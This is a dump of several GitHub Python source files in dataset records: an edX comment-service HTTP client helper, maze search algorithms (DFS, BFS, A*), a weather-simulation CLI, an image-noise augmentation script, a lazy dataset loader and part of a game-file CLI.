dic2.items())\n\n\n@contextmanager\ndef request_timer(request_id, method, url):\n start = time()\n yield\n end = time()\n duration = end - start\n dog_stats_api.histogram('comment_client.request.time', duration, end)\n log.info(\n \"comment_client_request_log: request_id={request_id}, method={method}, \"\n \"url={url}, duration={duration}\".format(\n request_id=request_id,\n method=method,\n url=url,\n duration=duration\n )\n )\n\n\ndef perform_request(method, url, data_or_params=None, *args, **kwargs):\n if data_or_params is None:\n data_or_params = {}\n headers = {\n 'X-Edx-Api-Key': getattr(settings, \"COMMENTS_SERVICE_KEY\", None),\n 'Accept-Language': get_language(),\n }\n request_id = uuid4()\n request_id_dict = {'request_id': request_id}\n\n if method in ['post', 'put', 'patch']:\n data = data_or_params\n params = request_id_dict\n else:\n data = None\n params = merge_dict(data_or_params, request_id_dict)\n with request_timer(request_id, method, url):\n response = requests.request(\n method,\n url,\n data=data,\n params=params,\n headers=headers,\n timeout=5\n )\n\n if 200 < response.status_code < 500:\n raise CommentClientRequestError(response.text, response.status_code)\n # Heroku returns a 503 when an application is in maintenance mode\n elif response.status_code == 503:\n raise CommentClientMaintenanceError(response.text)\n elif response.status_code == 500:\n raise CommentClient500Error(response.text)\n else:\n if kwargs.get(\"raw\", False):\n return response.text\n else:\n return json.loads(response.text)\n\n\nclass CommentClientError(Exception):\n def __init__(self, msg):\n self.message = msg\n\n def __str__(self):\n return repr(self.message)\n\n\nclass CommentClientRequestError(CommentClientError):\n def __init__(self, msg, status_code=400):\n super(CommentClientRequestError, self).__init__(msg)\n self.status_code = status_code\n\n\nclass CommentClient500Error(CommentClientError):\n pass\n\n\nclass CommentClientMaintenanceError(CommentClientError):\n pass\n","repo_name":"XiaodunServerGroup/medicalmooc","sub_path":"lms/lib/comment_client/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3052,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"21515395961","text":"\"\"\"\nThis is for practicing contents of searching problem\nin Classic Computer Science Problem in Python.\n\"\"\"\n\n## find path at maze\nfrom __future__ import annotations ## allow 'Optional[Node]' code\nfrom enum import Enum\nfrom heapq import heappop, heappush\nfrom math import sqrt\nimport random\nfrom collections import deque\nfrom typing import Callable, Deque, Dict, Generic, List, NamedTuple, Optional, Protocol, Set, TypeVar\n\n\nclass Cell(str, Enum):\n \"\"\"Represent status of each cell in maze\"\"\"\n EMPTY = \" \"\n BLOCKED = \"X\"\n START = \"S\"\n GOAL = \"G\"\n PATH = \"*\"\n\n\nclass MazeLocation(NamedTuple):\n \"\"\"Inherit NamedTuple?\n \n namedtuple example:\n \n from collections import namedtuple\n MazeLocation = namedtuple('MazeLocation', ['row', 'column'])\n \"\"\"\n \n row : int\n column : int\n\n\nclass Maze:\n def __init__(self,\n rows : int = 10,\n columns : int = 10,\n sparseness : float = 0.2,\n start : MazeLocation = MazeLocation(0, 0),\n goal : MazeLocation = MazeLocation(9, 9)\n ) -> None:\n \n self._rows = rows\n self._columns = columns\n self.start = start\n self.goal = goal\n \n self._grid: List[List[Cell]] = [[Cell.EMPTY for _ in range(columns)]\n for _ in range(rows)]\n \n self._randomly_fill(rows, columns, sparseness)\n \n self._grid[start.row][start.column] = Cell.START\n self._grid[goal.row][goal.column] = Cell.GOAL\n \n return \n \n def _randomly_fill(self,\n rows : int,\n columns : int,\n sparseness : float\n ) -> None:\n \n \"\"\"Fill Cell.BLOCKED at self._grid with some of sparseness\"\"\"\n \n for r in range(rows):\n for c in range(columns):\n if random.uniform(0, 1) < sparseness:\n self._grid[r][c] = Cell.BLOCKED\n \n return\n \n def __str__(self) -> str:\n \"\"\"Return string format of Maze instance\"\"\"\n \n output = ''\n for row in self._grid:\n output += \"\".join([item.value for item in row]) + '\\n'\n return output\n\n def goal_test(self, loc : MazeLocation) -> bool:\n return loc == self.goal\n \n def _blocked_test(self,\n row : int,\n column : int\n ) -> bool:\n \n return self._grid[row][column] == Cell.BLOCKED\n \n def _check_bound(self, row: int, column: int) -> bool:\n return row in range(self._rows) and column in range(self._columns)\n \n def successors(self,\n loc : MazeLocation\n ) -> List[MazeLocation]:\n\n \"\"\"Find all possible MazeLocation by List\"\"\"\n \n possible_locs = []\n if self._check_bound(loc.row + 1, loc.column) and \\\n not self._blocked_test(loc.row + 1, loc.column):\n possible_locs.append(MazeLocation(loc.row + 1, loc.column))\n \n if self._check_bound(loc.row - 1, loc.column) and \\\n not self._blocked_test(loc.row - 1, loc.column):\n possible_locs.append(MazeLocation(loc.row - 1, loc.column))\n \n if self._check_bound(loc.row, loc.column + 1) and \\\n not self._blocked_test(loc.row, loc.column + 1):\n possible_locs.append(MazeLocation(loc.row, loc.column + 1))\n \n if self._check_bound(loc.row, loc.column - 1) and \\\n not self._blocked_test(loc.row, loc.column - 1):\n possible_locs.append(MazeLocation(loc.row, loc.column - 1))\n \n return possible_locs\n \n def mark(self, path : List[MazeLocation]) -> None:\n \"\"\"mark '*' on path from input list\"\"\"\n \n for loc in path:\n self._grid[loc.row][loc.column] = Cell.PATH\n ## re-mark start, goal position\n self._grid[self.start.row][self.start.column] = Cell.START\n self._grid[self.goal.row][self.goal.column] = Cell.GOAL\n \n def clear(self, path : List[MazeLocation]) -> None:\n \"\"\"clear '*' marking on path\"\"\"\n \n for loc in path:\n self._grid[loc.row][loc.column] = Cell.EMPTY\n self._grid[self.start.row][self.start.column] = Cell.START\n self._grid[self.goal.row][self.goal.column] = Cell.GOAL\n\n\nT = TypeVar('T')\n\nclass Node(Generic[T]):\n def __init__(self,\n state: T,\n #parent: Optional['Node'],\n parent: Optional[Node],\n cost: float = 0.0,\n heuristic: float =0.0\n ) -> None:\n \n self.state = state\n self.parent = parent\n self.cost = cost\n self.heuristic = heuristic ## ??\n \n def __lt__(self, other: 'Node') -> bool:\n return (self.cost + self.heuristic) < (other.cost + other.heuristic)\n\n\nclass Stack(Generic[T]):\n \"\"\"Stack abstract data structure implemented by python list\"\"\"\n \n def __init__(self) -> None:\n self._container: List[T] = []\n \n @property\n def empty(self) -> bool:\n return not self._container\n\n def push(self, item: T) -> None:\n self._container.append(item)\n \n def pop(self) -> T:\n return self._container.pop()\n \n def __str__(self) -> str:\n return repr(self._container)\n \n\ndef dfs(\n initial : T,\n goal_test : Callable[[T], bool],\n successors : Callable[[T], List[T]]\n ) -> Optional[Node[T]]:\n \"\"\"Depth first search path from initial to goal\"\"\"\n \n frontier: Stack = Stack()\n explored: Set[T] = set()\n \n ## start to search path\n frontier.push(Node(initial, None))\n explored.add(initial)\n \n while not frontier.empty:\n current_node = frontier.pop()\n current_state = current_node.state\n if goal_test(current_state):\n return current_node\n for child in successors(current_state):\n if child not in explored:\n child_node = Node(child, current_node)\n frontier.push(child_node)\n explored.add(child)\n return None ## could not find goal\n\ndef node_to_path(node: Node[T]) -> List[T]:\n \"\"\"transform node connection info to list\"\"\"\n \n path: List[T] = []\n curr = node\n while curr:\n path.append(curr.state)\n curr = curr.parent\n path.reverse()\n return path\n\n\nclass Queue(Generic[T]):\n def __init__(self) -> None:\n self._container: Deque[T] = deque()\n \n @property\n def empty(self) -> bool:\n return not self._container\n \n def push(self, item: T) -> None:\n self._container.append(item)\n \n def pop(self) -> T:\n return self._container.popleft()\n \n def __repr__(self) -> str:\n return repr(self._container)\n\n\ndef bfs(\n initial : T,\n goal_test : Callable[[T], bool],\n successors : Callable[[T], List[T]]\n ) -> Optional[Node[T]]:\n \"\"\"Breadth first search path from initial to goal\"\"\"\n \n frontier: Queue[Node[T]] = Queue()\n explored: Set[T] = set()\n \n ## start bfs\n frontier.push(Node(initial, None))\n explored.add(initial)\n \n while not frontier.empty:\n current_node = frontier.pop()\n current_state = current_node.state\n if goal_test(current_state):\n return current_node\n for neighbor in successors(current_state):\n if neighbor not in explored:\n frontier.push(Node(neighbor, current_node))\n explored.add(neighbor)\n return None\n\n\nclass PriorityQueue(Generic[T]):\n def __init__(self) -> None:\n self._container: List[T] = []\n \n @property\n def empty(self) -> bool:\n return not self._container\n \n def push(self, item: T) -> None:\n heappush(self._container, item)\n \n def pop(self) -> T:\n return heappop(self._container)\n \n def __repr__(self) -> str:\n return repr(self._container)\n\n\ndef euclidean_distance(\n goal : MazeLocation\n ) -> Callable[[MazeLocation], float]:\n \"\"\"Return function which calculates euclidean distance\n between MazeLocation and goal\"\"\"\n def distance(ml : MazeLocation) -> float:\n \"\"\"Return euclidean distance btw input location and\n goal location\"\"\"\n xdist: int = ml.column - goal.column\n ydist: int = ml.row - goal.row\n return sqrt(xdist * xdist + ydist * ydist)\n return distance\n\ndef manhattan_distance(\n goal : MazeLocation\n ) -> Callable[[MazeLocation], float]:\n \"\"\"Return nested function which calculates\n manhattan distance from input location to goal location\"\"\"\n def distance(ml: MazeLocation) -> float:\n \"\"\"Return manhattan distance from inpu location to\n goal location\"\"\"\n xdist: int = abs(ml.column - goal.column)\n ydist: int = abs(ml.row - goal.row)\n return xdist + ydist\n return distance\n\ndef astar(\n initial : T,\n goal_test : Callable[[T], bool],\n successors : Callable[[T], List[T]],\n heuristic : Callable[[T], float]\n ) -> Optional[Node[T]]:\n \"\"\"A* algorithm for searching path\n\n Parameters\n ----------\n initial : T\n start location\n goal_test : Callable[[T], bool]\n function if T is goal location\n successors : Callable[[T], List[T]]\n function returns List of T (locations)\n heuristic : Callable[[T], float]\n function calculates heuristic estimates\n of remain distance\n\n Returns\n -------\n Optional[Node[T]]\n Node with goal location or None\n \"\"\"\n \n frontier: PriorityQueue[Node[T]] = PriorityQueue()\n frontier.push(Node(initial, None, 0.0, heuristic(initial)))\n \n explored: Dict[T, float] = {initial: 0.0}\n \n while not frontier.empty:\n current_node: Node[T] = frontier.pop()\n current_state: T = current_node.state\n if goal_test(current_state):\n return current_node\n \n for neighbor in successors(current_state):\n new_cost = current_node.cost + 1\n ## add or update neighbor's cost\n if neighbor not in explored or explored[neighbor] > new_cost:\n explored[neighbor] = new_cost \n frontier.push(Node(neighbor, current_node,\n new_cost, heuristic(neighbor)))\n return None","repo_name":"Beomman-Han/data-structure-and-algorithm","sub_path":"algorithm/classic_problem/ch2_search.py","file_name":"ch2_search.py","file_ext":"py","file_size_in_byte":10189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44642127442","text":"# -*- coding: utf-8 -*-\n\"\"\"\nEste módulo es el punto de entrada __main__ para la útilidad de comando.\n\"\"\"\nimport datetime\nimport enum\nimport click\n\nfrom . import conf\nfrom .core.wheater.job.watcher import WeatherWatcher\nfrom .core.wheater.statistics import coroutine as coro\nfrom .core.wheater.statistics.coroutine import WheaterStatsSumary\nfrom .core.galaxy.simulator import SpaceTime\n\nNOW = datetime.datetime.now()\n\nONE_HUMAN_YEAR = 365\nONE_VULCAN_YEAR = 72\nONE_BETASOIDE_YEAR = 120\nONE_FERENGI_YEAR = 360\n\n\ndef generate_entropy():\n click.clear()\n click.echo('| | | (_) | |')\n click.echo('| |__| |_ __| |')\n click.echo(\"| __ | |/ _` | '__/ _ \\ / _` |/ _ \\ '_ \\ / _ \")\n click.echo(\"| | | | | (_| | | | (_) | (_| | __/ | | | (_) |\")\n click.echo(\"|_| |_|_|\\__,_|_| \\___/ \\__, |\\___|_| |_|\\___(_)\")\n click.echo(\" __/ |\")\n click.echo(\" |___/\")\n\n\nclass CommandLineOption(enum.IntEnum):\n \"\"\"Lista de opciones de la app, línea de comandos.\n \"\"\"\n FORECASTING = 1\n INIT_WHEATER_JOB = 2\n\n\n@click.option('--generardatos', default=365*10)\ndef init_db():\n\n if conf.DATABASE_URL != conf.DEFAULT_DB: #wk. contratiempo.\n click.echo('Procesando datos...')\n\n # Creamos un object WheaterWatcher y le indicamos el número de lotes a envíar a db.\n watcher = WeatherWatcher(lot_size=conf.JOB_BATCHER)\n space_time = SpaceTime.galaxy(from_day=0, to_day=conf.JOB_WORK)\n\n with click.progressbar(space_time, length=conf.JOB_WORK) as stream:\n for stream_data in stream:\n watcher.analyze(stream_data)\n\n click.echo('done!')\n else:\n click.echo('!'*80)\n click.echo('\\n\\n Antes de continuar necesitas setear la variable de entorno HIDROGENO_DB con la '\n 'URL de la base de datos a usar')\n click.echo('\\n Para más información ver la documentación.\\n')\n click.echo('!' * 80)\n\ndef main():\n generate_entropy()\n\n opts = {\n CommandLineOption.FORECASTING: 'Pronóstico de Clima por Años. (simulación)',\n CommandLineOption.INIT_WHEATER_JOB: 'Volcar datos a bd con las condiciones climáticas de todos los días '\n '(utilizando \"JOB\" para calcularlas)'\n }\n click.echo('\\nSeleccione una opción:\\n')\n for opcion, descripcion in opts.items():\n click.echo('[{:d}] {:s}.'.format(opcion, descripcion))\n # mostrar opciones\n show_options()\n\n\n@click.command()\n@click.option('--option', default=1, prompt='Seleccione una opción:')\ndef show_options(option):\n \"\"\"Listado de opciones diponibles.\n \"\"\"\n if option == CommandLineOption.INIT_WHEATER_JOB.value:\n init_db()\n elif option == CommandLineOption.FORECASTING:\n forecast_wheater()\n else:\n click.echo('Debes seleccionar una opción')\n\n\n@click.command()\n@click.option('--years', default=10, prompt='Indique el número de años a predecir. Default (10):')\ndef forecast_wheater(years):\n\n days_to_calculate = 360 * years\n\n # llamammos subrutina, indicandole cuántos registros procesar antes de su cierre \"automático\".\n coro_stats = coro.listen_stream(days_to_calculate)\n\n try:\n\n click.echo('preparando simulación de {} años. {} días...'.format(years, days_to_calculate))\n\n # iniciamos \"simulación\" planetaria...partiendo del día Cero.\n data_space_stream = SpaceTime.galaxy(from_day=0, to_day=days_to_calculate)\n\n with click.progressbar(data_space_stream, length=days_to_calculate) as stream:\n\n for data in stream:\n # envíamos el (día, el clima, y el nivel de precipitación) para estadísticas.\n coro_stats.send(\n (data.day, data.wheater, data.precipitation)\n )\n\n except StopIteration as result:\n\n if isinstance(result.value, WheaterStatsSumary):\n\n # predicciones y datos estadísticos después de la \"simulación\"\n forecasting = result.value\n click.echo('*' * 100)\n\n # mostramos pronóstico del tiempo...\n click.echo(forecasting.periods_summary)\n click.echo(forecasting.pluviometer.summary)\n click.echo(forecasting.general_stats)\n else:\n raise\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"nicolasmendoza/hidrogeno","sub_path":"hydrogen/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":4356,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23297042001","text":"# -*- coding: utf-8 -*-\n# @project : Denoise-tensorflow\n# @Time : 2019-08-08 12:41 \n# @Author : ZhangXiao(sinceresky@foxmail.com)\n# @File : add_noisy_tool.py\n\nimport numpy as np\nimport cv2\nimport random\nimport os\n\nnoise_background_dir = 'noise/'\ntarget_w, target_h = 200, 120\n# target_w_all = 200\n\n\ndef get_noisy_ori(mat, size):\n sig = np.linspace(0, 50, size)\n np.random.shuffle(sig)\n\n # image = cv2.resize(mat, (180, 180), interpolation=cv2.INTER_CUBIC)\n image = mat[:min(mat.shape[0], target_h), :min(target_w, mat.shape[1])]\n # image = cv2.resize(image, (180, 180), interpolation=cv2.INTER_CUBIC)\n # _, bin = cv2.threshold(image, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\n # 做一次归一化\n for y in range(image.shape[0]):\n for x in range(image.shape[1]):\n if image[y][x] != 255:\n image[y][x] = 0\n else:\n image[y][x] = 255\n\n # image = mat\n row, col = image.shape[0], image.shape[1]\n if len(image.shape) < 3:\n ch = 1\n image = image.reshape(row, col, ch)\n else:\n ch = image.shape[2]\n mean = 0\n if target_w != image.shape[1] or target_h != image.shape[0]:\n blank = np.full((target_h, target_w, ch), 255, dtype=np.uint8)\n y = int(abs((target_h - image.shape[0]) / 2) - 1)\n if y < 0:\n y = 0\n x = int(abs(target_w - image.shape[1]) / 2) - 1\n if x < 0:\n x = 0\n blank[y:y+image.shape[0], x:x+image.shape[1]] = image\n image = blank\n # _, image = cv2.threshold(image, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\n # image = image.reshape(image.shape[0], image.shape[1], 1)\n use_background = False\n # cv2.imshow('do', image)\n if random.randint(0, 9) < 3:\n i = random.randint(0, size - 1)\n sigma = sig[i]\n gauss = np.random.normal(mean, sigma, (target_h, target_w, ch))\n gauss = gauss.reshape(target_h, target_w, ch)\n noisy = image + gauss\n noisy = np.clip(noisy, 0, 255)\n noisy = noisy.astype(np.uint8)\n else:\n noise_name = random.randint(1, 9)\n noise_mat = cv2.imread(os.path.join(noise_background_dir, str(noise_name) + '.png'), 0)\n noise_mat = cv2.resize(noise_mat, (target_w, target_h), interpolation=cv2.INTER_LANCZOS4)# w, h\n noise_mat = noise_mat.reshape((target_h, target_w, ch))\n for y in range(noise_mat.shape[0]):\n for x in range(noise_mat.shape[1]):\n if image[y][x] != 255:\n noise_mat[y][x] = image[y][x]\n noisy = noise_mat\n use_background = True\n\n # cv2.imshow('no', noisy)\n # if noisy.shape[2] != 1:\n # noisy = cv2.cvtColor(noisy, cv2.COLOR_BGR2GRAY)\n # if image.shape[2] != 1:\n # image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n random_num = random.randint(0, 9)\n if random_num < 3 or (use_background and random_num < 8):\n kernel_size = (3, 3)\n img_data_blur = cv2.GaussianBlur(noisy, kernel_size, 0.8)\n\n cv2.normalize(img_data_blur, img_data_blur, 0, 255, cv2.NORM_MINMAX)\n noisy = np.array(img_data_blur, dtype=np.uint8)\n if random.randint(0, 9) < 8:\n shape = noisy.shape\n noisy = cv2.resize(noisy, (int(shape[1] / 2), int(shape[0] / 2)), interpolation=cv2.INTER_LANCZOS4)\n noisy = cv2.resize(noisy, (shape[1], shape[0]), interpolation=cv2.INTER_LANCZOS4)\n noisy = noisy.reshape(shape)\n # print(noisy)\n # _, image = cv2.threshold(image, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\n # for y in range(image.shape[0]):\n # for x in range(image.shape[1]):\n # if image[y][x] < 128:\n # image[y][x] = 0\n # else:\n # image[y][x] = 255\n return noisy, image\n # cv2.imwrite(os.path.join(save_dir, \"noisy/%04d.png\" % i), noisy)\n # cv2.imwrite(os.path.join(save_dir, \"original/%04d.png\" % i), image)","repo_name":"zhangxiao339/DeNoise-tensorflow","sub_path":"data_util/add_noisy_tool.py","file_name":"add_noisy_tool.py","file_ext":"py","file_size_in_byte":3921,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"48"} +{"seq_id":"22115664084","text":"from .. import settings\nfrom .. import utils\n\nimport os\nimport pathlib\n\nclass DataObjects(object):\n \"\"\"\n An object that manages the lazy loading of objects and their file dependencies\n \n Example usage:\n --------------\n \n import biu\n import pandas as pd\n\n file = biu.utils.Acquire().curl('https://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data')\n data_objs = DataObjects(where='./', redo=False)\n data_objs.add_file(\"iris.tsv\", file)\n data_objs.register(\"iris\", [\"iris.tsv\"],\n lambda x: pd.read_csv(x[\"iris.tsv\"], index_col=False, names=['a','b','c','d','class']),\n docstring=\"An Pandas DataFrame of the IRIS data\")\n \n data_objs.iris\n data_objs.iris['e'] = data_objs.iris.a\n \"\"\"\n \n __slots__ = [ 'registered', 'files', 'local_files', 'loaded', 'where',\n 'download_where', 'redo', 'acquired_files' ]\n\n \n def __init__(self, where, download_where, redo=False, local_files=None):\n \"\"\"\n Initialize a DataObject object\n Parameters:\n -----------\n where: String. Where the final data should be stored\n download_where: String. Where the data should be downloaded\n redo: Boolean. Re-download the data, or not\n local_files: Dict: A dictionary of (name:path) for files\n add_property: Python class. If specified, objects will be added as properties to this class.\n \"\"\"\n \n self.where = where\n self.download_where = download_where\n self.redo = redo\n self.files = {}\n self.local_files = {}\n self.acquired_files = []\n self.registered = {}\n self.loaded = {}\n \n if local_files is not None:\n for lf_name, lf_path in local_files.items():\n self.local_files[lf_name] = utils.Acquire2(lf_path)\n self.files[lf_name] = self.local_files[lf_name]\n #efor\n #fi\n \n #edef\n \n def add_file(self, name, acquire_object, redo=None, finalize=True):\n \"\"\"\n Add a file acquire object.\n Parameters:\n -----------\n \n name: String. The name of the file\n acquire_object: biu.utils.Acquire2. The file acquisition pipeline\n redo: boolean. Set the redo status of this file, regardless of the total data object (Default is None)\n finalize: boolean|String\n if bool and true: at the end of the file acquisition, copy the file to \"self.where/name\".\n if string: at the end of the file acquisition, copy the file to \"self.where/finalize\".\n \n \"\"\"\n if name in self.local_files:\n utils.msg.dbm(\"The file '%s' has been specified by a localCopy, I will not add the new file specification.\" % name)\n else:\n redo = self.redo if redo is None else redo\n \n if not isinstance(acquire_object, utils.Acquire2):\n raise ValueError(\"Expected a biu.Acquire2 object.\")\n #fi\n \n acquire_object = acquire_object.set_redo(redo).set_where(self.download_where)\n \n if isinstance(finalize, str):\n acquire_object = acquire_object.finalize(\"%s/%s\" % (self.where, finalize))\n elif isinstance(finalize, bool) and finalize:\n acquire_object = acquire_object.finalize(\"%s/%s\" % (self.where, name))\n else:\n acquire_object = acquire_object.copy()\n #fi\n \n self.files[name] = acquire_object\n #fi\n #edef\n \n def get_file(self, name):\n \"\"\"\n Return the acquire file object.\n \"\"\"\n if name not in self.files:\n raise ValueError(\"No such file is known '%s'.\" % name)\n #fi\n return self.files[name]\n #edef\n \n def _acquire_files(self, files):\n \"\"\"\n Perform the acquisition pipeline for the files specified.\n parameters:\n -----------\n files: List of strings\n \"\"\"\n for f in files:\n if f in self.acquired_files:\n continue\n #fi\n\n self.files[f].acquire()\n #efor\n #edef\n \n def register(self, name, required_files, load_func):\n \"\"\"\n Register an object\n \n parameters:\n -----------\n name: String. python-identifier valid name of the object\n required_files: list. List of files (added by add_files) that need to exist before loading data\n load_func: Python function. Takes as input dictionary of paths. Must output some object\n docstring: String.\n \n NOTE: One or more of your arguments will most likely be the file of one of your files.\n If you have not specified a finalized location of these files, you must pass a placeholder parameter using file_path(file_name) such as this:\n \n Example:\n --------\n \n file = biu.utils.Acquire2().curl('https://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data')\n data_objs = DataObjects(where='./', redo=False)\n data_objs.add_file(\"iris.tsv\", file)\n data_objs.register(\"iris\", [\"iris.tsv\"],\n lambda x: pd.read_csv(x[\"iris.tsv\"], index_col=False, names=['a','b','c','d','class']),\n docstring=\"An Pandas DataFrame of the IRIS data\")\n \"\"\"\n if not name.isidentifier():\n raise ValueError(\"The name '%s' is not a valid object name. Must be a valid python identifier.\" % name)\n #fi\n \n if name in self.__slots__:\n raise ValueError(\"Sorry, '%s' is not a valid object name. It is already used by this class.\" % name)\n #fi\n \n for file in required_files:\n if file not in self.files:\n raise ValueError(\"No such file is known: '%s'.\" % file)\n #fi\n #efor\n \n if not hasattr(load_func, '__call__'):\n raise ValueError('The provided load_func is not callable.')\n #fi\n \n self.registered[name] = (load_func, required_files)\n \n getter = lambda x: self.get(name)\n setter = lambda x, value: self.set(name, value)\n prop = property(fget=getter, fset=setter)\n setattr(self.__class__, name, prop)\n #edef\n \n def load(self, name):\n \"\"\"\n Loads or re-loads an object\n \"\"\"\n if name not in self.registered:\n raise AttributeError(\"No such object is registered: '%s'.\" % name)\n #fi\n \n load_func, required_files = self.registered[name]\n self._acquire_files(required_files)\n \n self.loaded[name] = load_func({ file_name : self.files[file_name].path for file_name in required_files })\n #edef\n \n def isloaded(self, name):\n if name not in self.registered:\n raise NameError(\"No such object is registered: '%s'.\" % name)\n #fi\n return name in self.loaded\n #edef\n \n def get(self, name):\n \"\"\"\n Return an object. Load if not loaded. Raises ValueError if object is not known\n \"\"\"\n if name not in self.loaded:\n self.load(name)\n #fi\n \n return self.loaded[name]\n #edef\n \n def __getitem__(self, name):\n \"\"\"\n Return an object. Load if not loaded. Raises ValueError if object is not known\n \"\"\"\n return self.get(name)\n #edef\n \n def set(self, name, value):\n \"\"\"\n Change the value of a loaded object (Useful if you are doing data management within the dataset)\n \"\"\"\n if (name not in self.loaded) and (name not in self.registered):\n raise AttributeError(\"No such object is known: '%s'.\" % name)\n #fi\n self.loaded[name] = value\n #edef\n \n def __setitem__(self, name, value):\n \"\"\"\n Change the value of a loaded object (Useful if you are doing data management within the dataset)\n \"\"\"\n self.set(name, value)\n #edef\n\n def __contains__(self, name):\n \"\"\"\n Check if an object is registered.\n \"\"\"\n return name in self.registered\n #edef\n \n#eclass\n\n##############################################################\n\ndef Dataset2_test():\n \"\"\"\n A wrapper function that makes a new version of the Dataset2 class when it is run.\n \"\"\"\n \n class Dataset2_unique_class(Dataset2):\n def __init__(self, *pargs, **kwargs):\n super(Dataset2_unique_class, self).__init__(*pargs, **kwargs)\n #eclass\n \n return Dataset2_unique_class\n#edef\n\nclass Dataset2(object):\n \"\"\"\n A BIU Dataset Object (Version 2).\n Datasets consist of files and objects.\n The Dataset object manages the dynamic acquisition of files and the dynamic loading of files into objects.\n For example, the IRIS dataset consists of a csv file, which is loaded into a dataframe object.\n \n Datasets will also provide additional methods to specifically access the relevant dataset\n \"\"\"\n \n __slots__ = [ '__where', '__download_where', '__redo', '_obj', '_str_funcs' ]\n \n def __init__(self, dataset_identifier,\n where=None,\n download_where=None,\n redo=False, local_files=None):\n \"\"\"\n Initialize a Dataset object:\n Parameters:\n -----------\n dataset_identifier: String. A name for the dataset. Typically 'dataset_name/version'\n where: String. Where the final data should be stored\n download_where: String. Where the data should be downloaded\n redo: Boolean. Re-download the data, or not\n local_files: Dict: A dictionary of (name:path) for files\n \"\"\"\n \n where = where if where is not None else settings.getDataDir()\n download_where = download_where if download_where is not None else settings.getDownloadDir()\n \n class _data_class(DataObjects):\n def __init__(self, *pargs, **kwargs):\n super(_data_class, self).__init__(*pargs, **kwargs)\n #eclass\n \n for attr in object.__getattribute__(self, '__slots__'):\n object.__setattr__(self, attr, None)\n #efor\n \n where = os.path.abspath(os.path.expanduser(where) + '/' + dataset_identifier)\n download_where = os.path.abspath(os.path.expanduser(download_where))\n \n object.__setattr__(self, '__where', where)\n object.__setattr__(self, '__download_where', download_where)\n object.__setattr__(self, '__redo', redo)\n object.__setattr__(self, '_obj', _data_class(where, download_where, redo, local_files))\n object.__setattr__(self, '_str_funcs', [])\n #edef\n \n def _add_str_func(self, fun):\n \"\"\"\n Add a function that is evaluated and printed when a string representation is made.\n\n Parameters:\n -----------\n fun: Function. Dataset2 object -> string.\n e.g. lambda x: '\\n'.join(list(x._obj.files.keys()))\n \"\"\"\n \n if not hasattr(fun, '__call__'):\n raise ValueError(\"The item provided must be callable.\")\n #fi\n \n self._str_funcs.append(fun)\n #edef\n \n \n def __str__(self):\n \"\"\"\n Prepare a string representation of the class\n \"\"\"\n dstr = \"%s object\\n\" % self.__class__.__name__\n \n dstr += \"Where: %s\\n\" % object.__getattribute__(self, '__where')\n dstr += \"Downloaded data in: %s\\n\" % object.__getattribute__(self, '__download_where')\n dstr += \"Redo: %s\\n\" % str(object.__getattribute__(self, '__redo'))\n\n for f in self._str_funcs:\n fstr = f(self)\n if fstr is None:\n continue\n #fi\n for line in fstr.split('\\n'):\n dstr += ' ' + line + '\\n'\n #efor\n #efor\n\n dstr += ' Objects:\\n'\n for oname in self._obj.registered:\n if oname[0] == '_':\n continue\n #fi\n loaded = oname in self._obj.loaded\n dstr += ' * [%s] %s\\n' % (('X' if loaded else ' '), oname)\n #efor\n\n dstr += \" Files:\\n\"\n for what in self._obj.files:\n loc = self._obj.get_file(what).path\n if os.path.islink(loc):\n dstr += \" * [%s] %s : %s -> %s\\n\" % ('S' if self._obj.get_file(what).exists else ' ', what, loc, pathlib.Path(loc).resolve())\n else:\n dstr += \" * [%s] %s : %s\\n\" % ('X' if self._obj.get_file(what).exists else ' ', what, loc)\n #fi\n #efor\n return dstr\n #edef\n \n def __repr__(self):\n \"\"\"\n Prepare a string representation of the class\n \"\"\"\n return str(self)\n #edef\n \n def __getattr__(self, name):\n \"\"\"After regular attribute access, try looking up the name within the registered objects\n This allows simpler access to objects for interactive use.\n \"\"\"\n\n # Note: obj.x will always call obj.__getattribute__('x') prior to\n # calling obj.__getattr__('x').\n \n try:\n object.__getattribute__(self, name)\n except AttributeError:\n pass\n #etry\n \n return object.__getattribute__(self, '_obj')[name]\n\n #edef\n\n def __setattr__(self, name, value):\n \"\"\"After regular attribute access, try setting the name\n This allows simpler access to objects for interactive use.\n \"\"\"\n\n # first try regular attribute access via __getattribute__, so that\n # e.g. ``obj.x`` and ``obj.x = 4`` will always reference/modify\n # the same attribute.\n\n try:\n object.__getattribute__(self, name)\n return object.__setattr__(self, name, value)\n except AttributeError:\n pass\n #etry\n \n object.__getattribute__(self, '_obj')[name] = value\n #edef\n \n def __dir__(self):\n \"\"\"\n To allow tab-completion for the registered objects.\n \"\"\"\n return object.__dir__(self) + list(self._obj.registered.keys())\n #edef\n\n#eclass","repo_name":"thiesgehrmann/BIU","sub_path":"biu/structures/dataset2.py","file_name":"dataset2.py","file_ext":"py","file_size_in_byte":14461,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"3429108257","text":"import argparse\nimport sys\n\nfrom .. import Tree\nfrom ..cli import default_rename, glob, rename, root_folder, show_progress\n\n\ndef main() -> int:\n parser = argparse.ArgumentParser(description=\"Flatten your Slippi game files to a shared parent folder\")\n parser.add_argument(*root_folder[\"name_or_flags\"], **root_folder[\"kwargs\"])\n parser.add_argument(*glob[\"name_or_flags\"], **glob[\"kwargs\"])\n parser.add_argument(*show_progress[\"name_or_flags\"], **show_progress[\"kwargs\"])\n parser.add_argument(*default_rename[\"name_or_flags\"], **default_rename[\"kwargs\"])\n\n args = parser.parse_args()\n\n with Tree(args.root_folder, glob=args.glob, show_progress=args.show_progress) as tree:\n rename(tree, args)\n\n return 0\n\n\nif __name__ == \"__main__\":\n 